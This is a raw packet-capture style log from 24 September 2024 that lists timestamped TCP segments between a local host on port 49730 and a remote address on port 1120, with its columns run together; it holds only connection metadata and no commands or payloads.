Sep 24, 2024 17:46:09.626980066 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.627789021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627800941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627814054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627825975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627837896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627851009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627860069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.627862930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627860069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.627876997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627890110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627902985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627916098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627926111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627933025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627944946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627957106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627969027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.627973080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.627973080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.627973080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.627980947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.628020048 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.628043890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.628706932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.628720045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.628732920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.628750086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.628772974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.628793955 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.628884077 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.631575108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.631587029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.631679058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.631805897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.631819963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.631891012 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.640398026 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.645406008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.645575047 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.650544882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.862886906 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.867748022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.867844105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.872721910 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.997643948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.003907919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.004548073 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.009444952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.220226049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.220707893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.220721960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.220736027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.220748901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.220762968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.220845938 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.220845938 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.221149921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.221295118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.221357107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.221369028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.221438885 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.221438885 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.221538067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.221551895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.221690893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.256695032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.256714106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.256721020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.256808043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.256824970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.256838083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.256911039 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.257078886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.257112026 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.257137060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.257148981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.257246017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.257252932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.257266045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.257477045 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.257988930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.258065939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.258076906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.258128881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.258142948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.258161068 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.258704901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.258769989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.258781910 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.258819103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.259067059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.259080887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.259363890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.259633064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.259685040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.259696007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.259700060 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.259752035 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.259932041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.259944916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.260055065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.292686939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.292723894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.292736053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.292774916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.292788029 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.292845011 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.292937994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293021917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293034077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293077946 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.293133974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293145895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293158054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293180943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.293222904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.293556929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293697119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293728113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293771982 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.293809891 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293822050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293838024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.293859959 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.293911934 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.294142008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294188976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294200897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294248104 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.294344902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294358015 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294369936 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294384003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294397116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.294414997 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.294476986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.294516087 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313172102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313205004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313220024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313240051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313251019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313263893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313270092 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313277006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313302994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313347101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313383102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313452959 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313458920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313523054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313534975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313545942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313565969 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313618898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313662052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313673019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313678980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313724041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313735008 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313739061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313750982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.313765049 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.313791037 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.314333916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.314357042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.314368010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.314414024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.314482927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.314493895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.314549923 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349219084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349244118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349262953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349280119 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349315882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349387884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349400043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349411964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349425077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349447966 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349484921 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349518061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349530935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349663973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349673986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349684954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349733114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349762917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349822044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349843979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349921942 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.349962950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349976063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.349987030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350001097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350039005 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.350039005 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.350074053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350188017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.350454092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350502014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350513935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350650072 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.350651026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350662947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350676060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350691080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350698948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.350780010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.350785971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350843906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350857019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.350867987 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.350893974 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.351423979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351468086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351480961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351635933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351648092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351658106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.351664066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351679087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351720095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.351720095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.351838112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351849079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351862907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.351901054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.351901054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.352390051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352432013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352443933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352538109 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.352538109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352550983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352561951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352575064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352706909 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.352706909 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.352787971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352798939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.352811098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.353023052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.353023052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385037899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385066986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385080099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385163069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385174036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385185003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385199070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385247946 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385247946 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385248899 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385282993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385346889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385386944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385397911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385427952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385427952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385435104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385684967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385804892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385816097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385900974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385914087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385926962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385940075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.385984898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385984898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385984898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.385984898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.386056900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386070013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386082888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386096001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386109114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386204004 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.386204004 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.386204004 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.386789083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386830091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386841059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386980057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.386991024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387002945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387016058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387124062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387135029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387146950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387170076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.387170076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.387170076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.387170076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.387403011 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.387806892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387852907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387865067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387984991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.387995958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.388009071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.388021946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.388096094 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.388096094 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.388096094 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.388114929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.388128042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.388772011 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.406325102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406344891 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406358004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406431913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406444073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406455040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406466961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406488895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.406488895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.406488895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.406691074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406702995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406713009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406718969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406725883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406788111 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.406788111 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.406852007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406975031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.406986952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407048941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407059908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407073021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407087088 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407123089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.407123089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.407123089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.407123089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.407327890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407341003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407352924 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407363892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407377005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407402039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407416105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.407429934 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.407429934 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.407551050 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.407627106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.408477068 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.441850901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.441909075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.441925049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.441998005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442009926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442024946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442126989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442169905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442183018 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442183971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442183971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442183971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442228079 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442306995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442320108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442333937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442348957 CEST11204973064.95.13.143192.168.2.4
